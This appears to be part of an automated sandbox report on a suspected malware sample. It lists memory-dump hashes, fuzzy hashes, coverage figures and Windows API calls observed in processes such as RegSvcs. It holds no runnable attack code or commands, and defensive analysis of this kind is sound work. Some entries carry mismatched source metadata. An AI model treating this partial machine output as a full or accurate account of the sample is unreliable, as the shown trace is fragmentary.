                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f71cb1a12df7ec2863ff34caa80562de7472e4791add59532d01511611f41f4b
                                                                  • Instruction ID: a20381450c0844722d876f014d0792d7393b02f0c88038609f3b19b736070a49
                                                                  • Opcode Fuzzy Hash: f71cb1a12df7ec2863ff34caa80562de7472e4791add59532d01511611f41f4b
                                                                  • Instruction Fuzzy Hash: F5C080779646034FF303DE20CD632C07BE4AF5B18078850B3C441CD495E219510D4640
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2229102468.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_4ce0000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0a82f300909b807b5bf726ed0bea1e5dbde4a89551248bb76a2d0f8881d56f0f
                                                                  • Instruction ID: 1271798f21d6e1e0a87e1eae287d21cc07c2e035b40280f0c4ea0aca6560d516
                                                                  • Opcode Fuzzy Hash: 0a82f300909b807b5bf726ed0bea1e5dbde4a89551248bb76a2d0f8881d56f0f
                                                                  • Instruction Fuzzy Hash: FFC08C09504A824EE30B923118C08802FE59CCB02078A42F280008B053C16C21465242
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2229102468.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_4ce0000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8fc304a26ba6a9b8e09db51e88682a954301326f375d2764bec1dfa900b44145
                                                                  • Instruction ID: 9de7ac702d921bb81b30492041e851d75af5e0b5cbf34299d5a2708bb28df354
                                                                  • Opcode Fuzzy Hash: 8fc304a26ba6a9b8e09db51e88682a954301326f375d2764bec1dfa900b44145
                                                                  • Instruction Fuzzy Hash: 1EB0923BA04018C9DB008A86B4417EEF764E780265F104023C2115204193721264AAD1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2229102468.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_4ce0000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3f511607e790221a2f2dcd6e97a8bb3a0d65d62d392e8c090948622415da908e
                                                                  • Instruction ID: 0dfc2720777f63421202845d4fb21847554f92407c627dcfcd9209a5c78d8f7b
                                                                  • Opcode Fuzzy Hash: 3f511607e790221a2f2dcd6e97a8bb3a0d65d62d392e8c090948622415da908e
                                                                  • Instruction Fuzzy Hash: 2FB01254A6410101710CF1371C9843600179EC07047C4FC641200940088A1CF004300D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2229102468.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_4ce0000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
                                                                  • API String ID: 0-2711123852
                                                                  • Opcode ID: e97a782109fd537a7fdc7740046f4f7dd4f9fc45bdc1fa288788f964a26b1224
                                                                  • Instruction ID: 077af22f2356f8d02915c7ab50b5cbadf8e03ec4e320f463f06a872f462f6928
                                                                  • Opcode Fuzzy Hash: e97a782109fd537a7fdc7740046f4f7dd4f9fc45bdc1fa288788f964a26b1224
                                                                  • Instruction Fuzzy Hash: 70228030E412098FCB58EF79E891A9D77BAFF40700F1049A8D059AB269DF346D59CFA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2229102468.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_4ce0000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
                                                                  • API String ID: 0-2711123852
                                                                  • Opcode ID: f6d5a447f6b433a77f9778ccdf2a59c389a43c4d13687d409c12cc3777ae6246
                                                                  • Instruction ID: 6f0ccb353e45f9862bade1f1ff3960b3f49223715aaab549c7333df15d1954dc
                                                                  • Opcode Fuzzy Hash: f6d5a447f6b433a77f9778ccdf2a59c389a43c4d13687d409c12cc3777ae6246
                                                                  • Instruction Fuzzy Hash: 5B128030E412098FCB58EF79E890A9D77BAFF40700F104968D059AB269DF386D59CFA5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2229102468.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_4ce0000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
                                                                  • API String ID: 0-3121157708
                                                                  • Opcode ID: aba65b16e9ba08ce4d2cbfb35ab771cce4261e70ba11b163a1abc8d34561dbd8
                                                                  • Instruction ID: a30cc6aff2bb7977685d0356acb4dc72951cfe42eacc5830edf63df71a9730b2
                                                                  • Opcode Fuzzy Hash: aba65b16e9ba08ce4d2cbfb35ab771cce4261e70ba11b163a1abc8d34561dbd8
                                                                  • Instruction Fuzzy Hash: 60716F30E0130ACBCB08EFB9D8505DDBBB2FF80700F614A29D059AB255EF74695ACB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2229102468.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_4ce0000_tIFjYTCo.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
                                                                  • API String ID: 0-3121157708
                                                                  • Opcode ID: 398e2c178fd2eb15a9725d76bb6196e141a290dcad947ffbd615cdd10b33876a
                                                                  • Instruction ID: 15a3802ef8b6dec98f1afcd00047c1f8f45c453c704f40daec82396a636c6be0
                                                                  • Opcode Fuzzy Hash: 398e2c178fd2eb15a9725d76bb6196e141a290dcad947ffbd615cdd10b33876a
                                                                  • Instruction Fuzzy Hash: 2E713D30E0130A8BCB08EFB9D8546DDB7B2FF84700F614A28D0596B259EF74695ACB95

                                                                  Execution Graph

                                                                  Execution Coverage:10.2%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:150
                                                                  Total number of Limit Nodes:13
                                                                  Execution graph (rendered as a diagram in the original report; the raw node/edge list is omitted here). Entry nodes and the Win32 APIs reached from them:
                                                                  • 5e82a48: DuplicateHandle
                                                                  • 27a7358: DeleteFileW (at 27a739e)
                                                                  • 27a0848: GlobalMemoryStatusEx (via 27a1390, 27a14c0, 27a7530, 5e9d930) and GetModuleHandleW (via 5e816f8 / 5e816e8 / 5e8177a, 5e80dc4, 5e85060, 5e85204, 5e8aa60, 5e8acc8, 5e8af60)
                                                                  • 5e82800: GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId
                                                                  • 5e8cf10: CreateWindowExW (at 5e8cf78)
                                                                  • e2d01c: CallWindowProcW (via 5e8d0c8 / 5e8d0b7, 5e89eac, 5e8e218, 5e8de7c, 5e8e47c / 5e8e3a0 / 5e8e3b0, 5e8e468 / 5e8e458, 5e8f620, 5e8f6ea)

                                                                  Control-flow Graph

                                                                  Rendered as a diagram in the original report (executed and not-executed basic blocks are colour-coded there; the raw block list is omitted here). Function 5e827fa-5e829cd: calls GetCurrentProcess, GetCurrentThread, GetCurrentProcess and GetCurrentThreadId, plus an internal call to 5e829d0.
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 05E8287E
                                                                  • GetCurrentThread.KERNEL32 ref: 05E828BB
                                                                  • GetCurrentProcess.KERNEL32 ref: 05E828F8
                                                                  • GetCurrentThreadId.KERNEL32 ref: 05E82951
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.3353745230.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_5e80000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ProcessThread
                                                                  • String ID:
                                                                  • API String ID: 2063062207-0
                                                                  • Opcode ID: b407427be0f9e4078a28e4a556d6eba374ab751d445238ffc7e7dc49324dcc65
                                                                  • Instruction ID: 1d45c6f260c714b4abb8aaf9e059c9a608f3c9cd5a3314fdb2a5e063188ccb12
                                                                  • Opcode Fuzzy Hash: b407427be0f9e4078a28e4a556d6eba374ab751d445238ffc7e7dc49324dcc65
                                                                  • Instruction Fuzzy Hash: F95186B49002098FDB14EFAAC549BAEBFF1FF48304F208059E159A7361DB389944CB65

                                                                  Control-flow Graph

                                                                  Rendered as a diagram in the original report (executed and not-executed basic blocks are colour-coded there; the raw block list is omitted here). Function 5e82800-5e829cd: same block structure and API sequence as the 5e827fa entry above (GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId, internal call to 5e829d0).
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 05E8287E
                                                                  • GetCurrentThread.KERNEL32 ref: 05E828BB
                                                                  • GetCurrentProcess.KERNEL32 ref: 05E828F8
                                                                  • GetCurrentThreadId.KERNEL32 ref: 05E82951
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.3353745230.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_5e80000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ProcessThread
                                                                  • String ID:
                                                                  • API String ID: 2063062207-0
                                                                  • Opcode ID: 7ffc112836a2aced6fc3c9fc7f454918afaa3b143f381af8e05f512c701f13cb
                                                                  • Instruction ID: 6cf451eec9bbbe8cb6778c443b24704b233bab78e37c0034aba8083fe8fe5093
                                                                  • Opcode Fuzzy Hash: 7ffc112836a2aced6fc3c9fc7f454918afaa3b143f381af8e05f512c701f13cb
                                                                  • Instruction Fuzzy Hash: A05165B49003098FDB14EFAAD549BAEBFF1FF48314F208059E159A7361DB385984CB65
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 05E8AF7E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.3353745230.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_5e80000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: b2ee858d7b004651469637a0750f713dcec0aa2b6297d8a88e29666e44152908
                                                                  • Instruction ID: 5af1a8fb32e38b3f2d0a2fabc6092e6886cca29c64d7916e02052f0427049e23
                                                                  • Opcode Fuzzy Hash: b2ee858d7b004651469637a0750f713dcec0aa2b6297d8a88e29666e44152908
                                                                  • Instruction Fuzzy Hash: 39813770A00B058FD724EF29D4457AABBF6FF88318F00992ED48AD7A50DB75E945CB90
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.3353859012.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_5e90000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b867f94df09e49e2f7ac275f9b756a0b3775730e271c70b3277c6deeab3d10ab
                                                                  • Instruction ID: a6f2ae62f7772aa890b1148e129334c2d74e2dd4aaa837d85fddf0f06171213d
                                                                  • Opcode Fuzzy Hash: b867f94df09e49e2f7ac275f9b756a0b3775730e271c70b3277c6deeab3d10ab
                                                                  • Instruction Fuzzy Hash: 20412672E043958FCB08DF69D81069ABFF9EF89210F14856AD548A7281EB789845CBE1
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05E8D022
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.3353745230.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_5e80000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID:
                                                                  • API String ID: 716092398-0
                                                                  • Opcode ID: 336cb1cb8352844d5f8e1588d2805aa140c1cd7415f3631a4da236b75bcb8c5d
                                                                  • Instruction ID: 254ec14e50ea9be94082a822ced72e94a972ae4f5b1acb932b6a880e348e86ac
                                                                  • Opcode Fuzzy Hash: 336cb1cb8352844d5f8e1588d2805aa140c1cd7415f3631a4da236b75bcb8c5d
                                                                  • Instruction Fuzzy Hash: FA51D0B1D003099FDB14DFA9C984ADEBBB6FF48314F64812AE819AB250D7749845CF90
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05E8D022
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.3353745230.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_5e80000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID:
                                                                  • API String ID: 716092398-0
                                                                  • Opcode ID: 22fbdca36e9ef0d2a7a544ff44d7b83a693c09f60b557d53a8098cbbe798677f
                                                                  • Instruction ID: 65c1534412cb405574a39eb49dc9082f2c070f808b847b929eb9a7ad4a1ee0ac
                                                                  • Opcode Fuzzy Hash: 22fbdca36e9ef0d2a7a544ff44d7b83a693c09f60b557d53a8098cbbe798677f
                                                                  • Instruction Fuzzy Hash: 9141E0B1D00309DFDB14DF99C984ADEBBB6FF48304F64822AE819AB250D774A845CF90
                                                                  APIs
                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 05E8F711
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.3353745230.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_ef0000_GUIVTme.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: db08a9e78f7d4195de93a6f104a75f6db2955c066dc59b1f4de37794c201309a
                                                                  • Instruction ID: f0b9581ac8cbc15abf1c4e1ba15e7441b4045bee4eaa2651e3d921a70236ef0f
                                                                  • Opcode Fuzzy Hash: db08a9e78f7d4195de93a6f104a75f6db2955c066dc59b1f4de37794c201309a
                                                                  • Instruction Fuzzy Hash: 9E01B136E0020A9FCB00EFB4D8408AFFBF5FF8C30071086AAE51997224E771A915CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.2332699429.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_ef0000_GUIVTme.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c1a3d8d29bc6bf7970e3144960c77a6fd182695687f027d128c732238ea98b05
                                                                  • Instruction ID: 8e3b7ade040d73c60d19d339c96024162bae86e8ecad62e278c30ddf67a06ccd
                                                                  • Opcode Fuzzy Hash: c1a3d8d29bc6bf7970e3144960c77a6fd182695687f027d128c732238ea98b05
                                                                  • Instruction Fuzzy Hash: B7F01C75A40319CFDB14EB74C5587AD7BF0AB48704F241898D502BB2A0CBB49C84CB51
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.2332699429.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_ef0000_GUIVTme.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 032af2529e5ddfc6446e7422f3f17b56b922cfd8c19e4727723594e6200adc77
                                                                  • Instruction ID: 10bfd3c18fdf7b6dafd63a2640f5bbbe578c38f1393ea8c41e08a0e8b8060640
                                                                  • Opcode Fuzzy Hash: 032af2529e5ddfc6446e7422f3f17b56b922cfd8c19e4727723594e6200adc77
                                                                  • Instruction Fuzzy Hash: 43D067B1D0121DAF8B40EFB999051EEBBF8FE49250B104566D919F7201E6705A148BD1
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.2332699429.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_ef0000_GUIVTme.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dd26b4fe28a0e4bade1c8c7731468f7fe25fac3ffd446caa205c80252a1175a5
                                                                  • Instruction ID: ba2cfe7249185ef3e66239895322c210c8d16e11494babda861336c81a8efe46
                                                                  • Opcode Fuzzy Hash: dd26b4fe28a0e4bade1c8c7731468f7fe25fac3ffd446caa205c80252a1175a5
                                                                  • Instruction Fuzzy Hash: F1D0A735340204CF8710DF28E544C953774EB4E71032040D9E524CB251E761DD10CB41
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.2332699429.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_ef0000_GUIVTme.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5579e8a945af91d0cb57ebb35d79a83d09a145130539751154c3a17b503073a9
                                                                  • Instruction ID: 8f448c3660baf21c1cbe72806f0f22a7a968a99a4d8abea06e9af8c4bd8da1e1
                                                                  • Opcode Fuzzy Hash: 5579e8a945af91d0cb57ebb35d79a83d09a145130539751154c3a17b503073a9
                                                                  • Instruction Fuzzy Hash: 52D0A771D00219DECF108BB858040DCBFF0EA492B07140395D515F7640E3751601CB80